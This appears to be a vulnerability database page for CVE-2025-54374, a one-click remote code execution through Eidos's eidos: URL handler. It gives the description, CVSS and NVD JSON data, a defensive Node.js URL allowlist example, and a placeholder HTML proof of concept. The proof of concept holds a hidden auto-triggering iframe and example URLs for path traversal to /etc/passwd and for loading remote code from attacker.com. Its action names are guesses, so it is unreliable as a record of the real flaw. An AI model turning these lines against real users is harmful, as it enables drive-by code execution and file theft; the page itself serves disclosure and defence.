Security Vulnerability Report
CVE-2025-54374 CVSS 8.8 HIGH

CVE-2025-54374

Published: 2025-10-03 20:15:33
Last Modified: 2025-10-24 19:03:30

Description

Eidos is an extensible framework for Personal Data Management. Versions 0.21.0 and below contain a one-click remote code execution vulnerability. An attacker can exploit this vulnerability by embedding a specially crafted eidos: URL on any website, including a malicious one they control. When a victim visits such a site or clicks on the link, the browser triggers the app’s custom URL handler (eidos:), causing the Eidos application to launch and process the URL, leading to remote code execution on the victim’s machine. This issue does not have a fix as of October 3, 2025.
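The chain described above (the browser hands an eidos: URL to the registered handler, the application launches and acts on whatever the URL contains) is the general custom-protocol-handler risk, and the mitigation is to treat the incoming URL as untrusted input: parse it, match it against a fixed allowlist of actions and parameter shapes, and reduce it to a plain intent object before anything is dispatched. The following Node.js example is added here as an illustration and is not Eidos project code; the action names (open-space, open-doc), the parameter names and the regular expressions are hypothetical, since the page does not describe Eidos's actual URL grammar.

```javascript
// Added example (not Eidos project code). A defensive dispatcher for a custom
// "eidos:" URL scheme: the URL the browser hands to the app is untrusted input,
// so it is parsed, matched against a fixed allowlist and reduced to a plain
// intent object. Action and parameter names below are hypothetical.

// Allowlist: action name -> required params and the exact shape each may take.
const ALLOWED_ACTIONS = new Map([
  ["open-space", { required: ["name"], shape: { name: /^[A-Za-z0-9_-]{1,64}$/ } }],
  ["open-doc",   { required: ["id"],   shape: { id: /^[0-9a-f]{8,32}$/ } }],
]);

const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Returns { ok: true, action, params } or { ok: false, reason }.
// The result is data only; nothing here is ever handed to a shell, eval() or a module loader.
function parseCustomUrl(raw) {
  let url;
  try {
    url = new URL(raw);                 // WHATWG parser built into Node.js
  } catch {
    return { ok: false, reason: "unparseable" };
  }
  if (url.protocol !== "eidos:") return { ok: false, reason: "wrong-scheme" };
  if (url.username || url.password) return { ok: false, reason: "credentials-present" };

  // "eidos://open-doc?..." puts the action in hostname; "eidos:open-doc?..." puts it in pathname.
  const action = (url.hostname || url.pathname.replace(/^\/+/, "")).toLowerCase();
  const spec = ALLOWED_ACTIONS.get(action);
  if (!spec) return { ok: false, reason: "unknown-action" };

  const params = {};
  for (const [key, value] of url.searchParams) {
    // hasOwn keeps inherited names such as "constructor" or "__proto__" out of the lookup
    if (!hasOwn(spec.shape, key)) return { ok: false, reason: `unexpected-param:${key}` };
    if (!spec.shape[key].test(value)) return { ok: false, reason: `bad-param:${key}` };
    params[key] = value;
  }
  for (const key of spec.required) {
    if (!hasOwn(params, key)) return { ok: false, reason: `missing-param:${key}` };
  }
  return { ok: true, action, params };
}

// Constructed inputs: one legitimate link and the placeholder link used in this page's PoC section.
console.log(parseCustomUrl("eidos://open-space?name=my_notes"));
console.log(parseCustomUrl("eidos://run?cmd=calc.exe"));
```

Anything that fails validation is dropped whole with a reason string rather than partially applied, and the accepted result carries only allowlisted keys with values that matched a fixed pattern. That is the property CWE-94 (code injection, the weakness assigned in the raw JSON record on this page) requires of a handler: URL-derived strings must never reach a command, an interpreter or a loader.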

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mayneyao:eidos:*:*:*:*:*:node.js:*:* - VULNERABLE
Eidos <= 0.21.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The handler actions and parameters it uses (run, cmd, exec, import) are placeholders, as the PoC's own comments state; the vendor advisory linked under References is the authoritative description of the affected handler.
html
<!-- HTML PoC: One-Click RCE via eidos: custom URL protocol handler -->
<!-- Save as .html and open in browser, then click the link -->
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CVE-2025-54374 PoC</title>
</head>
<body>
  <h1>CVE-2025-54374 - Eidos One-Click RCE</h1>
  <!-- Malicious eidos: URL crafted to trigger RCE when Eidos app processes it.
       The payload is embedded in the URL parameters that Eidos parses without sanitization.
       Replace the payload below with actual exploit code targeting Eidos <= 0.21.0. -->
  <a id="exploit-link" href="eidos://run?cmd=calc.exe">Click me (Benign Demo)</a>
  <!-- More realistic malicious payload examples:
       - eidos://open?file=../../../../etc/passwd (path traversal)
       - eidos://exec?code=<base64_encoded_payload> (code execution)
       - eidos://import?url=http://attacker.com/malicious.eidos (remote code loading) -->
  <br><br>
  <!-- Auto-trigger variant (works if browser is configured to auto-open protocol handlers) -->
  <iframe src="eidos://run?cmd=malicious_command" style="display:none;"></iframe>
  <script>
    // Auto-redirect variant for demonstration
    // window.location.href = "eidos://run?cmd=malicious_payload";
  </script>
</body>
</html>

References

https://github.com/mayneyao/eidos/security/advisories/GHSA-qhhm-56qp-xr2r (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-54374",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-03T20:15:33.180",
    "lastModified": "2025-10-24T19:03:30.450",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Eidos is an extensible framework for Personal Data Management. Versions 0.21.0 and below contain a one-click remote code execution vulnerability. An attacker can exploit this vulnerability by embedding a specially crafted eidos: URL on any website, including a malicious one they control. When a victim visits such a site or clicks on the link, the browser triggers the app’s custom URL handler (eidos:), causing the Eidos application to launch and process the URL, leading to remote code execution on the victim’s machine. This issue does not have a fix as of October 3, 2025"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-94"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mayneyao:eidos:*:*:*:*:*:node.js:*:*",
                "versionEndIncluding": "0.21.0",
                "matchCriteriaId": "4D7351B0-32EF-4870-8279-9A947AF7D90B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/mayneyao/eidos/security/advisories/GHSA-qhhm-56qp-xr2r",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/mayneyao/eidos/security/advisories/GHSA-qhhm-56qp-xr2r",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}